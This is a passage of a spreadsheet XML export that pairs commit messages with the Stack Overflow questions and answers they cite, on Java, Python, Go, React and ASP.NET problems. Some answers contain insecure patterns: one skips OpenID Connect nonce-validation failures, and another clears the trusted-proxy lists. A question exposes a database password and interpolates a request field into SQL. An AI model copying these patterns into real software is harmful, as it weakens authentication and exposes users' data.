See: https://stackoverflow.com/questions/55571046/eclipse-is-confused-by-imports-accessible-from-more-than-one-module</t>
  </si>
  <si>
    <t>This is caused by
a JAR on the Classpath that contains the package java.awt that also exists in the system library but the
JRE System Library is on the Modulepath
In the Java Platform Module System (JPMS) it is not allowed that the same package is made visible by more than one module. If the Modulepath and the Classpath is used, everything on the Classpath is handled as the &lt;unnamed&gt; module. In your case, the package java.awt is exported by the system module java.desktop and also exposed by the &lt;unnamed&gt; module, as it is contained in a JAR on the Classpath.
Since the JRE System Library cannot be moved from the Modulepath to the Classpath (see this answer by Stephan Herrmann for details), you have the following options:
Set the compiler compliance to 1.8 (as you already mentioned)
Rebuilt the JAR to avoid Java system library package names inside the JAR (if reflection is used, additional code changes may be necessary):
If you have the source code, change the package names (e.g. change the package and subpackae java to java_util and javax to javax_util) and recreate the JAR
If you have only the .class files you have to decompile the .class files first</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to set up a query for routing on Kamailio so that it asks a SQL database.&lt;/p&gt;
&lt;p&gt;This is the information that I have in the configuration file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!ifdef WITH_MYSQL
loadmodule &amp;quot;db_mysql.so&amp;quot;
modparam(&amp;quot;db_mysql&amp;quot;, &amp;quot;db_url&amp;quot;, &amp;quot;mysql://kamailio:Pablo3090@localhost/kamailio&amp;quot;)
#!endif
request_route {
    # Handle SIP OPTIONS (Heartbeat)
    if (is_method(&amp;quot;OPTIONS&amp;quot;)) {
        sl_send_reply(200, &amp;quot;OK&amp;quot;);
        exit;
    }
    if (is_method(&amp;quot;INVITE&amp;quot;)) {
        xlog(&amp;quot;L_INFO&amp;quot;, &amp;quot;Handling INVITE request\n&amp;quot;);
        # Query the database for the contact domain based on phone number
        if (sql_query(&amp;quot;kamailio&amp;quot;, &amp;quot;SELECT contact_domain FROM sip_routing WHERE phone_number='$rU'&amp;quot;, &amp;quot;result&amp;quot;)) {
            if ($dbr(result=&amp;gt;rows) &amp;gt; 0) {
                $var(contact_domain) = $dbr(result=&amp;gt;[0][0]);
                append_to_reply(&amp;quot;Contact: &amp;lt;sip:$rU;tgrp=teams_trunk;trunk-context=teams_tk@$var(contact_domain);user=phone&amp;gt;\r\n&amp;quot;);
            } else {
                xlog(&amp;quot;L_WARN&amp;quot;, &amp;quot;No routing found for $rU\n&amp;quot;);
            }
            sql_query_free(&amp;quot;result&amp;quot;);
        } else {
            xlog(&amp;quot;L_ERR&amp;quot;, &amp;quot;Database query failed!\n&amp;quot;);
        }
        sl_send_reply(&amp;quot;300&amp;quot;, &amp;quot;Multiple Choices&amp;quot;);
        exit;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However when I debug using&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sudo kamailio -f /etc/kamailio/kamailio.cfg -DD -E 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;it fails with this error:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;0(55419) CRITICAL:  [core/cfg.y:4017]: yyerror_at(): parse error in config file /etc/kamailio/kamailio.cfg, line 553, column 110: unknown command, missing loadmodule?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The line relates to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (sql_query(&amp;quot;kamailio&amp;quot;, &amp;quot;SELECT contact_domain FROM sip_routing WHERE phone_number='$rU'&amp;quot;, &amp;quot;result&amp;quot;)) {
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have searched but I can't seem to find a fix, would anyone have any idea how to fix the query?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C16</t>
  </si>
  <si>
    <t>bug-fix needed on render in proc() state:
- useRef(group)
- proc return group and add within R3F
- call this.forceUpdate() or useState
https://stackoverflow.com/questions/30626030/can-you-force-a-react-component-to-rerender-without-calling-setstate
- ...eventually move to components?</t>
  </si>
  <si>
    <t>In class components, you can call this.forceUpdate() to force a rerender.
Documentation: https://react.dev/reference/react/Component#forceupdate
In function components, there's no equivalent of forceUpdate, but you can contrive a way to force updates with the useState hook.</t>
  </si>
  <si>
    <t xml:space="preserve">Do you have any experience of designing a Real Shared-Nothing Architecture?
Would you have some readings to recommend me?
</t>
  </si>
  <si>
    <t>C160</t>
  </si>
  <si>
    <t>Add API module dependencies to Javadoc classpath: As per http://stackoverflow.com/a/34572606/1676363</t>
  </si>
  <si>
    <t>You should also add all your dependency to the javadoc.classpath. Try this:
task javadoc(type: Javadoc) {
    source = android.sourceSets.main.java.srcDirs
    classpath += project.files(android.getBootClasspath().join(File.pathSeparator))
}
afterEvaluate {
    javadoc.classpath += files(android.libraryVariants.collect { variant -&gt;
        variant.javaCompileProvider.get().classpath.files
    })
}</t>
  </si>
  <si>
    <t xml:space="preserve">If you had to make a case to a business about adopting or moving to an agile development methodology (like SCRUM or XP etc) what case would you make (how do you sell the concept)?  
e.g. 
How would you describe the concepts and benefits to a non-technical person?
If you have successfully done so, what was the winning argument/case/rationale?
Edit: The reason I ask is that a friend of mine (he is the solution architect at a firm) is currently trying to decide how to approach his management about exactly this topic, and I've given him what I can in terms of suggestions.  Curious especially to hear from those who have successfully made a case to move to an agile-aligned methdology. 
</t>
  </si>
  <si>
    <t>C161</t>
  </si>
  <si>
    <t>Cyclic module dependency fix
Exception in Tkinter callback
Traceback (most recent call last):
  File "/usr/lib/python2.7/lib-tk/Tkinter.py", line 1486, in __call__
    return self.func(*args)
  File "/home/artbot345/Downloads/Y13Computing-master/RegisterScreen.py", line 53, in &lt;lambda&gt;
    BackButton['command'] = lambda: self.goBack()
  File "/home/artbot345/Downloads/Y13Computing-master/RegisterScreen.py", line 83, in goBack
    app = LoginScreen(root)
Has been fixed.
See http://stackoverflow.com/questions/744373/circular-or-cyclic-imports-in-python and http://stackoverflow.com/questions/6351805/cyclic-module-dependencies-and-relative-imports-in-python to understand why this is needed.</t>
  </si>
  <si>
    <t>Suppose we have two modules with cyclic dependencies:
    # a.py
    import b
    def f(): return b.y
    x = 42
&lt;x&gt;
    # b.py
    import a
    def g(): return a.x
    y = 43
The two modules are in the directory `pkg` with an empty `__init__.py`.  Importing `pkg.a` or `pkg.b` works fine, as explained in [this answer][1].  If I change the imports to relative imports
    from . import b
I get an `ImportError` when trying to import one of the modules:
    &gt;&gt;&gt; import pkg.a
    Traceback (most recent call last):
      File "&lt;stdin&gt;", line 1, in &lt;module&gt;
      File "pkg/a.py", line 1, in &lt;module&gt;
        from . import b
      File "pkg/b.py", line 1, in &lt;module&gt;
        from . import a
    ImportError: cannot import name a
Why do I get this error?  Isn't the situation pretty much the same as above?  (Is this related to [this question][2]?)
**Edit**: I'm aware of ways to avoid the circular dependency, but I'm interested in the reason for the error anyway.
[1]: https://stackoverflow.com/questions/744373/python-circular-or-cyclic-imports/744403#744403
[2]: https://stackoverflow.com/questions/6282368/why-does-import-module-and-then-from-package-import-module-load-the-module-ag
First let's start with how from import work in python:
Well first let's look at the byte code:
&gt;&gt;&gt; def foo():
...     from foo import bar
&gt;&gt;&gt; dis.dis(foo)
2           0 LOAD_CONST               1 (-1)
              3 LOAD_CONST               2 (('bar',))
              6 IMPORT_NAME              0 (foo)
              9 IMPORT_FROM              1 (bar)
             12 STORE_FAST               0 (bar)
             15 POP_TOP             
             16 LOAD_CONST               0 (None)
             19 RETURN_VALUE        
hmm  interesting :), so from foo import bar is translated to first IMPORT_NAME foo which equivalent to import foo and then IMPORT_FROM bar.
Now what IMPORT_FROM do ?
let's see what python do when he found IMPORT_FROM:
TARGET(IMPORT_FROM)
     w = GETITEM(names, oparg);
     v = TOP();
     READ_TIMESTAMP(intr0);
     x = import_from(v, w);
     READ_TIMESTAMP(intr1);
     PUSH(x);
     if (x != NULL) DISPATCH();
     break;
Well basically he get the the names to import from, which is in our foo() function will be bar, then he pop from the frame stack the value v which is the return of the the last opcode executed which is IMPORT_NAME, then call the function import_from() with this two arguments :
static PyObject *
import_from(PyObject *v, PyObject *name)
{
    PyObject *x;
    x = PyObject_GetAttr(v, name);
    if (x == NULL &amp;&amp; PyErr_ExceptionMatches(PyExc_AttributeError)) {
        PyErr_Format(PyExc_ImportError, "cannot import name %S", name);
    }
    return x;
}
As you can see the import_from() function is quiet easy, it try first to get the attribute name from the module v, if it don't exist it raise ImportError else return this attribute.
Now what this have to do with relative import ?
Well relative import like from . import b are equivalent for example in the case that is in the OP question to from pkg import b.
But how this happen ? To understand this we should take a look to the import.c module of python specially to the function get_parent(). As you see the function is quiet long to list here but in general what it does when it see a relative import is to try to replace the dot . with the parent package depending on the __main__ module, which is again from the OP question is the package pkg.
Now let's put all this together and try to figure out why we end up with the behavior in the OP question.
For this it will help us if we can see what python do when doing imports, well it's our lucky day python come already with this feature which can be enabled by running it in extra verbose mode -vv.
So using the command line: python -vv -c 'import pkg.b':
Python 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) 
[GCC 4.4.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
import pkg # directory pkg
# trying pkg/__init__.so
# trying pkg/__init__module.so
# trying pkg/__init__.py
# pkg/__init__.pyc matches pkg/__init__.py
import pkg # precompiled from pkg/__init__.pyc
# trying pkg/b.so
# trying pkg/bmodule.so
# trying pkg/b.py
# pkg/b.pyc matches pkg/b.py
import pkg.b # precompiled from pkg/b.pyc
# trying pkg/a.so
# trying pkg/amodule.so
# trying pkg/a.py
# pkg/a.pyc matches pkg/a.py
import pkg.a # precompiled from pkg/a.pyc
#   clear[2] __name__
#   clear[2] __file__
#   clear[2] __package__
#   clear[2] __name__
#   clear[2] __file__
#   clear[2] __package__
...
Traceback (most recent call last):
  File "&lt;string&gt;", line 1, in &lt;module&gt;
  File "pkg/b.py", line 1, in &lt;module&gt;
    from . import a
  File "pkg/a.py", line 2, in &lt;module&gt;
    from . import a
ImportError: cannot import name a
# clear __builtin__._
hmm what just happen before the ImportError ?
First) from . import a  in pkg/b.py is called, which is translated as explained above to from pkg import a, which is again in bytecode is equivalent to import pkg; getattr(pkg, 'a'). But wait a minute a is a module too ?! Well here came the fun part if we have something like from module|package import module in this case a second import will happen which is the import of the module in the import clause. So again in the OP example we need now to import pkg/a.py, and as you know first of all we set in our sys.modules a key for our new module which will be pkg.a and then we continue our interpretation of the module pkg/a.py, but before the module pkg/a.py finish importing it call from . import b.
Now come the Second) part, pkg/b.py will be imported and in it turn it will first attempt to import pkg which because pkg is already imported so there is a key pkg in our sys.modules it will just return the value of that key. Then it will import b set the pkg.b key in sys.modules and start the interpretation. And we arrive to this line from . import a !
But remember pkg/a.py is already imported which mean ('pkg.a' in sys.modules) == True so the import will be skipped, and only the getattr(pkg, 'a') will be called , but what will happen ? python didn't finish importing pkg/a.py !? So only getattr(pkg, 'a') will be called , and this will raise an AttributeError in the import_from() function, which will be translated to ImportError(cannot import name a).
DISCLAIM : This is my own effort to understand what is happening inside the interpreter, i'm far away of being an expert.
EDIt: This answer was rephrased because when i tried to read it again i remarked how my answer was bad formulated, hope now it will be more useful :)</t>
  </si>
  <si>
    <t>First let's start with how from import work in python:
Well first let's look at the byte code:
&gt;&gt;&gt; def foo():
...     from foo import bar
&gt;&gt;&gt; dis.dis(foo)
2           0 LOAD_CONST               1 (-1)
              3 LOAD_CONST               2 (('bar',))
              6 IMPORT_NAME              0 (foo)
              9 IMPORT_FROM              1 (bar)
             12 STORE_FAST               0 (bar)
             15 POP_TOP             
             16 LOAD_CONST               0 (None)
             19 RETURN_VALUE        
hmm  interesting :), so from foo import bar is translated to first IMPORT_NAME foo which equivalent to import foo and then IMPORT_FROM bar.
Now what IMPORT_FROM do ?
let's see what python do when he found IMPORT_FROM:
TARGET(IMPORT_FROM)
     w = GETITEM(names, oparg);
     v = TOP();
     READ_TIMESTAMP(intr0);
     x = import_from(v, w);
     READ_TIMESTAMP(intr1);
     PUSH(x);
     if (x != NULL) DISPATCH();
     break;
Well basically he get the the names to import from, which is in our foo() function will be bar, then he pop from the frame stack the value v which is the return of the the last opcode executed which is IMPORT_NAME, then call the function import_from() with this two arguments :
static PyObject *
import_from(PyObject *v, PyObject *name)
{
    PyObject *x;
    x = PyObject_GetAttr(v, name);
    if (x == NULL &amp;&amp; PyErr_ExceptionMatches(PyExc_AttributeError)) {
        PyErr_Format(PyExc_ImportError, "cannot import name %S", name);
    }
    return x;
}
As you can see the import_from() function is quiet easy, it try first to get the attribute name from the module v, if it don't exist it raise ImportError else return this attribute.
Now what this have to do with relative import ?
Well relative import like from . import b are equivalent for example in the case that is in the OP question to from pkg import b.
But how this happen ? To understand this we should take a look to the import.c module of python specially to the function get_parent(). As you see the function is quiet long to list here but in general what it does when it see a relative import is to try to replace the dot . with the parent package depending on the __main__ module, which is again from the OP question is the package pkg.
Now let's put all this together and try to figure out why we end up with the behavior in the OP question.
For this it will help us if we can see what python do when doing imports, well it's our lucky day python come already with this feature which can be enabled by running it in extra verbose mode -vv.
So using the command line: python -vv -c 'import pkg.b':
Python 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) 
[GCC 4.4.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
import pkg # directory pkg
# trying pkg/__init__.so
# trying pkg/__init__module.so
# trying pkg/__init__.py
# pkg/__init__.pyc matches pkg/__init__.py
import pkg # precompiled from pkg/__init__.pyc
# trying pkg/b.so
# trying pkg/bmodule.so
# trying pkg/b.py
# pkg/b.pyc matches pkg/b.py
import pkg.b # precompiled from pkg/b.pyc
# trying pkg/a.so
# trying pkg/amodule.so
# trying pkg/a.py
# pkg/a.pyc matches pkg/a.py
import pkg.a # precompiled from pkg/a.pyc
#   clear[2] __name__
#   clear[2] __file__
#   clear[2] __package__
#   clear[2] __name__
#   clear[2] __file__
#   clear[2] __package__
...
Traceback (most recent call last):
  File "&lt;string&gt;", line 1, in &lt;module&gt;
  File "pkg/b.py", line 1, in &lt;module&gt;
    from . import a
  File "pkg/a.py", line 2, in &lt;module&gt;
    from . import a
ImportError: cannot import name a
# clear __builtin__._
hmm what just happen before the ImportError ?
First) from . import a  in pkg/b.py is called, which is translated as explained above to from pkg import a, which is again in bytecode is equivalent to import pkg; getattr(pkg, 'a'). But wait a minute a is a module too ?! Well here came the fun part if we have something like from module|package import module in this case a second import will happen which is the import of the module in the import clause. So again in the OP example we need now to import pkg/a.py, and as you know first of all we set in our sys.modules a key for our new module which will be pkg.a and then we continue our interpretation of the module pkg/a.py, but before the module pkg/a.py finish importing it call from . import b.
Now come the Second) part, pkg/b.py will be imported and in it turn it will first attempt to import pkg which because pkg is already imported so there is a key pkg in our sys.modules it will just return the value of that key. Then it will import b set the pkg.b key in sys.modules and start the interpretation. And we arrive to this line from . import a !
But remember pkg/a.py is already imported which mean ('pkg.a' in sys.modules) == True so the import will be skipped, and only the getattr(pkg, 'a') will be called , but what will happen ? python didn't finish importing pkg/a.py !? So only getattr(pkg, 'a') will be called , and this will raise an AttributeError in the import_from() function, which will be translated to ImportError(cannot import name a).
DISCLAIM : This is my own effort to understand what is happening inside the interpreter, i'm far away of being an expert.
EDIt: This answer was rephrased because when i tried to read it again i remarked how my answer was bad formulated, hope now it will be more useful :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm trying to make a streamlit app that screens through about in a 1gb file, and does statistical tests.&lt;/p&gt;
&lt;p&gt;It can have multiple categorical variable.&lt;/p&gt;
&lt;p&gt;Now my problem is that if I use st.cache_data on the data loading artifact, then it only caches it within the disk. Is there any way of putting it in the memory? I've used a profiler and it said that out of the 30s execution time 29s was that it was reading it in, so I know that my filtering algo is efficient.&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# First load
st.write(&amp;quot;First load_data call...&amp;quot;)
start_time = time.time()
df_raw1, unique_tools_all1, unique_category_name_all1, filt_other_quantitative1 = load_data(live_file)
first_load_time = time.time() - start_time
st.write(f&amp;quot;First load completed in {first_load_time:.2f} seconds&amp;quot;)
# Second load
st.write(&amp;quot;Second load_data call...&amp;quot;)
start_time = time.time()
df_raw2, unique_tools_all2, unique_category_name_all2, filt_other_quantitative2 = load_data(live_file)
second_load_time = time.time() - start_time
st.write(f&amp;quot;Second load completed in {second_load_time:.2f} seconds&amp;quot;)
# Third load 
st.write(&amp;quot;Third load_data call...&amp;quot;)
start_time = time.time()
df_raw3, unique_tools_all3, unique_category_name_all3, filt_other_quantitative3 = load_data(live_file)
third_load_time = time.time() - start_time
st.write(f&amp;quot;Third load completed in {third_load_time:.2f} seconds&amp;quot;)
st.write(&amp;quot;Cache performance summary:&amp;quot;)
st.write(f&amp;quot;First load: {first_load_time:.2f}s&amp;quot;)
st.write(f&amp;quot;Second load: {second_load_time:.2f}s&amp;quot;)
st.write(f&amp;quot;Third load: {third_load_time:.2f}s&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here the loading times are 40s, 25s, 25s. I'd assume that if I give the load_data the @st.cache_data decorator then I'd have something closer to 40s, 1s, 1s&lt;/p&gt;
&lt;p&gt;My initial thought of a workaround was to have the data loading done within the main body and then the filtering done within an @st.fragment (they are super cool until they aren't), and then my problem would be solved, because then whenever I select the new filtering, then it only re-executes the filtering and just accesses the previously loaded, in memory dataframe.&lt;/p&gt;
&lt;p&gt;Then the problem was that the st.selectbox widget cannot be run from within a fragment because streamlit gods said so.&lt;/p&gt;
&lt;p&gt;How can I speed up st.cache?&lt;/p&gt;
&lt;p&gt;I know that one method would be to use smaller df, but due to the stat tests being used I can't just yeet out rows. Whether its reading from a parquet file, or from st.cache it always takes time&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C162</t>
  </si>
  <si>
    <t>Introduced MVC partial view rendering for Web Forms pages
Implemented solution for rendering MVC partial views in Web Forms pages
described on Stack Overflow:
https://stackoverflow.com/questions/702746/how-to-include-a-partial-view-inside-a-webform#answer-24867151</t>
  </si>
  <si>
    <t>I had a look at the MVC source to see if I could figure out how to do this. There seems to be very close coupling between controller context, views, view data, routing data and the html render methods.
Basically in order to make this happen you need to create all of these extra elements. Some of them are relatively simple (such as the view data) but some are a bit more complex - for instance the routing data will consider the current WebForms page to be ignored.
The big problem appears to be the HttpContext - MVC pages rely on a HttpContextBase (rather than HttpContext like WebForms do) and while both implement IServiceProvider they're not related. The designers of MVC made a deliberate decision not to change the legacy WebForms to use the new context base, however they did provide a wrapper.
This works and lets you add a partial view to a WebForm:
public class WebFormController : Controller { }
public static class WebFormMVCUtil
{
    public static void RenderPartial( string partialName, object model )
    {
        //get a wrapper for the legacy WebForm context
        var httpCtx = new HttpContextWrapper( System.Web.HttpContext.Current );
        //create a mock route that points to the empty controller
        var rt = new RouteData();
        rt.Values.Add( "controller", "WebFormController" );
        //create a controller context for the route and http context
        var ctx = new ControllerContext( 
            new RequestContext( httpCtx, rt ), new WebFormController() );
        //find the partial view using the viewengine
        var view = ViewEngines.Engines.FindPartialView( ctx, partialName ).View;
        //create a view context and assign the model
        var vctx = new ViewContext( ctx, view, 
            new ViewDataDictionary { Model = model }, 
            new TempDataDictionary() );
        //render the partial view
        view.Render( vctx, System.Web.HttpContext.Current.Response.Output );
    }
}
Then in your WebForm you can do this:
&lt;% WebFormMVCUtil.RenderPartial( "ViewName", this.GetModel() ); %&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">How do you ensure that the project will be build with "good" design decisions enabling a flexible software architecture?
How do you balance between completely leaving the architecture to the teams on one side, and let all architecture control to a few individuals on the other side?
Do you have an "architecture group", "architecture label" or things like that?
</t>
  </si>
  <si>
    <t>C163</t>
  </si>
  <si>
    <t>webforms example nonce issue.
https://stackoverflow.com/questions/29502788/enabling-ssl-in-asp-net-mvc-5-app-results-in-openidconnectprotocolvalidator-issu</t>
  </si>
  <si>
    <t>You can ignore exceptions if the error message starts with OICE_20004 or contains IDX10311. Note: do it on your own risk.
Notifications = new OpenIdConnectAuthenticationNotifications()
{
    RedirectToIdentityProvider = (context) =&gt;
    {
        // Ensure the URI is picked up dynamically from the request;
        string appBaseUrl = context.Request.Scheme + "://" + context.Request.Host + context.Request.PathBase + context.Request.Uri.PathAndQuery;
        context.ProtocolMessage.RedirectUri = context.Request.Scheme + "://" + context.Request.Host + context.Request.PathBase + context.Request.Uri.PathAndQuery;
        context.ProtocolMessage.PostLogoutRedirectUri = appBaseUrl;
        return Task.FromResult(0);
    },
    AuthenticationFailed = (context) =&gt;
    {
        if (context.Exception.Message.StartsWith("OICE_20004") || context.Exception.Message.Contains("IDX10311"))
        {
            context.SkipToNextMiddleware();
            return Task.FromResult(0);
        }
        return Task.FromResult(0);
    },
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hello i was trying to follow the guide for electron-db but i keep getting an error that the table file does not exist. I tried using the createTable like it said&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;db.createTable('customers', (succ, msg) =&amp;gt; {
  // succ - boolean, tells if the call is successful
  console.log(&amp;quot;Success: &amp;quot; + succ);
  console.log(&amp;quot;Message: &amp;quot; + msg);
})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and i also tried specifying the location just like it says&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const __dirname = path.dirname(fileURLToPath(import.meta.url)); //already was in main.js
const location = path.join(__dirname, '')
db.createTable('customers', location, (succ, msg) =&amp;gt; {
  // succ - boolean, tells if the call is successful
  if (succ) {
    console.log(msg)
  } else {
    console.log('An error has occured. ' + msg)
  }
})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;i get the same result every time &amp;quot;Table file does not exist&amp;quot; in terminal and electron pops up an error alert and says this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Uncaught Exception:
Error: ENOENT: no such file or directory, open '/Users/chris/Library/Application Support/mtm/employees.json'
at Object.readFileSync (node:fs:448:20)
at t.readFileSync (node:electron/js2c/node_init:2:9900)
at Object.valid (/Volumes/Media Tower/Dropbox/Development/user/projects/mtm/node_modules/electron-db/index.js:94:24)
at IpcMainImpl.&amp;lt;anonymous&amp;gt; (file:///Volumes/Media%20Tower/Dropbox/Development/user/projects/mtm/dist-electron/main.js:57:10)
at IpcMainImpl.emit (node:events:519:28)
at WebContents.&amp;lt;anonymous&amp;gt; (node:electron/js2c/browser_init:2:82563)
at WebContents.emit (node:events:519:28)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;i've spent so much time trying to find an asnwer to this before i came here. Any help would be greatly appreciated&lt;/p&gt;
&lt;p&gt;EDIT: Further googling and i found a reference to delete the node_modules folder and package.lock and then npm install... that did not work&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C164</t>
  </si>
  <si>
    <t>EFFICIENCY UPDATE; two major updates (see description)
Two changes that significantly boosted the performance. First: no longer using math.pow(num, 2) as it is slow in Go. Now using num*num. Second: No longer using the contains() function. Instead, removeDuplicateGPS() is used as a map is much faster to search than iterating through a slice. This person asked the EXACT SAME QUESTION as the problem encountered in this program. https://stackoverflow.com/questions/66643946/how-to-remove-duplicates-strings-or-int-from-slice-in-go</t>
  </si>
  <si>
    <t>I found Burak's and Fazlan's solution helpful. Based on that, I implemented the simple functions that help to remove or filter duplicate data from slices of strings, integers, or any other types with generic approach.
Here are my three functions, first is generic, second one for strings and last one for integers of slices. You have to pass your data and return all the unique values as a result.
Generic solution: =&gt; Go v1.18
func removeDuplicate[T comparable](sliceList []T) []T {
	allKeys := make(map[T]bool)
	list := []T{}
	for _, item := range sliceList {
		if _, value := allKeys[item]; !value {
			allKeys[item] = true
			list = append(list, item)
		}
	}
	return list
}
To remove duplicate strings from slice:
func removeDuplicateStr(strSlice []string) []string {
	allKeys := make(map[string]bool)
	list := []string{}
	for _, item := range strSlice {
		if _, value := allKeys[item]; !value {
			allKeys[item] = true
			list = append(list, item)
		}
	}
	return list
}
To remove duplicate integers from slice:
func removeDuplicateInt(intSlice []int) []int {
	allKeys := make(map[int]bool)
	list := []int{}
	for _, item := range intSlice {
		if _, value := allKeys[item]; !value {
			allKeys[item] = true
			list = append(list, item)
		}
	}
	return list
}
You can update the slice type, and it will filter out all duplicates data for all types of slices.
Here is the GoPlayground link: https://go.dev/play/p/iyb97KcftMa</t>
  </si>
  <si>
    <t xml:space="preserve">Often multiple applications share a large codebase of libraries that change often in development.  In these cases, I prefer to create a solution named after the suite, and include separate projects for each application and the shared libraries.
Is this a good approach?  How do others structure their code bases for things like a suite of applications?
</t>
  </si>
  <si>
    <t>C165</t>
  </si>
  <si>
    <t>C:F: fix bug of authentication when proxying with nginx
See https://stackoverflow.com/questions/43860128/asp-net-core-google-authentication</t>
  </si>
  <si>
    <t>This happens because your application which is running behind a reverse proxy server doesn't have any idea that originally request came over HTTPS.
SSL/TLS Termination Proxy
The configuration of the reverse proxy described in the question is called SSL/TLS Termination reverse proxy. That means that secure traffic is established between a client and a proxy server. The proxy server decrypts a request and then forwards it to an application over HTTP protocol.
The issue with this configuration is that an application behind it is not aware that client sent request over HTTPS. So when it comes to redirect to itself it uses
HttpContext.Request.Scheme
,
HttpContext.Request.Host
and
HttpContext.Request.Port
to build a valid URL for redirect.
X-Forwarded-* HTTP Headers
This is where
X-Forwarded-*
headers come into play. To let the application know that request is originally coming through a proxy server over HTTPS we have to configure the proxy server to set
X-Forwarded-For
and
X-Forwarded-Proto
HTTP headers.
location / {
    proxy_pass http://localhost:5000;
    proxy_http_version 1.1;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header X-Forwarded-Proto $scheme;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection keep-alive;
    proxy_set_header Host $host;
    proxy_cache_bypass $http_upgrade;
}
OK, now if we get back to ASP.NET Core application and take a look at incoming HTTP request we will see both
X-Forwarded-*
headers set, however a redirect URL still uses HTTP scheme.
Forwarded Headers Middleware
Basically this middleware overrides
HttpContext.Request.Scheme
and
HttpContext.Connection.RemoteIpAddress
to values which were provided by
X-Forwarded-Proto
and
X-Forwarded-For
headers appropriately. To make it happen let's add it to pipeline by adding the following line somewhere in the beginning of the
Startup.Configure()
method.
var forwardedHeadersOptions = new ForwardedHeadersOptions
        {
            ForwardedHeaders = ForwardedHeaders.XForwardedFor | ForwardedHeaders.XForwardedProto,
            RequireHeaderSymmetry = false
        };
        forwardedHeadersOptions.KnownNetworks.Clear();
        forwardedHeadersOptions.KnownProxies.Clear();
        app.UseForwardedHeaders(forwardedHeadersOptions);
This should eventually make your application construct valid URLs with HTTPS scheme.
My Story
The code above looks different to what Microsoft suggests. If we take a look in
documentation
their code looks a bit shorter:
app.UseForwardedHeaders(new ForwardedHeadersOptions
{
     ForwardedHeaders = ForwardedHeaders.XForwardedFor | ForwardedHeaders.XForwardedProto
});
However this didn't work for me. Also  according to the comments under
this issue
I'm not alone.
I have a nginx set up as reverse proxy for ASP.NET Core application running in Docker container. It became more complicated after I put everything behind Amazon Load Balancer (ELB).
I followed advice from the documentation first, but it didn't work for me. I have got the following warning in my app:
Parameter count mismatch between X-Forwarded-For and X-Forwarded-Proto
Then I looked at my
X-Forwarded-*
headers and realized that they had different length.
X-Forwarded-For
header was containing 2 records (comma separated IP addresses), while
X-Forwarded-Proto
only one record
https
. This is how I came up to setting the property
RequireHeaderSymmetry
to
false
.
Well, I got rid of 'Parameter count...' warning message, but immediately after that I faced another odd debug message:
Unknown proxy: 172.17.0.6:44624
After looking into the source code of
ForwardedHeadersMiddleware
I have finally figured out that I have to either clean up both
KnownNetworks
and
KnownProxies
collections of the
ForwardedHeadersOptions
or add my docker network
172.17.0.1/16
to the list of known networks. Right after that I have finally got it working.
PS: For those who sets up a SSL/TLS termination on load balancer (e.g. Amazon Load Balancer or ELB)
DON'T
set header
X-Forwarded-Proto
in nginx configuration. This will override correct
https
value which came from load balance to the
http
scheme and redirect url will be wrong. I have not found yet how to just append scheme used in nginx to the header instead of overriding it.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have this code, i cant seems to extract the userType form user_public_metadata.
something has change in clerk sessionClaim and cant figure it out&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import { clerkMiddleware, createRouteMatcher } from &amp;quot;@clerk/nextjs/server&amp;quot;;
import { NextResponse } from &amp;quot;next/server&amp;quot;;
const isStudentRoute = createRouteMatcher([&amp;quot;/user/(.*)&amp;quot;]);
const isTeacherRoute = createRouteMatcher([&amp;quot;/teacher/(.*)&amp;quot;]);
export default clerkMiddleware(async (auth, req) =&amp;gt; {
  const { sessionClaims } = await auth();
  const userRole =
    (sessionClaims?.metadata as { userType: &amp;quot;student&amp;quot; | &amp;quot;teacher&amp;quot; })
      ?.userType || &amp;quot;student&amp;quot;;
  if (isStudentRoute(req)) {
    if (userRole !== &amp;quot;student&amp;quot;) {
      const url = new URL(&amp;quot;/teacher/courses&amp;quot;, req.url);
      return NextResponse.redirect(url);
    }
  }
  if (isTeacherRoute(req)) {
    if (userRole !== &amp;quot;teacher&amp;quot;) {
      const url = new URL(&amp;quot;/user/courses&amp;quot;, req.url);
      return NextResponse.redirect(url);
    }
  }
});
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C166</t>
  </si>
  <si>
    <t>Added functions to authenticate ws conns
I've removed the previous authentication method because this question on stackoverflow give me a better idea of implementation:
https://stackoverflow.com/questions/39692065/websocket-angular-2-and-json-web-token-authentication
This method probably will be faster than the previous.</t>
  </si>
  <si>
    <t>I settled on the following protocol:
1. Client logs into the site and receives an authentication token (JSON Web Token)
GET /auth
{
	user: 'maggie',
	pwd:  'secret'
}
// response
{ token: '4ad42f...' }
2. Authenticated client requests a websocket connection ticket
GET /ws_ticket
Authorization: Bearer 4ad42f...
// response: single-use ticket (will only pass validation once)
{ ticket: 'd76a55...', expires: 1475406042 }
3. Client opens the websocket, sending the ticket in query param
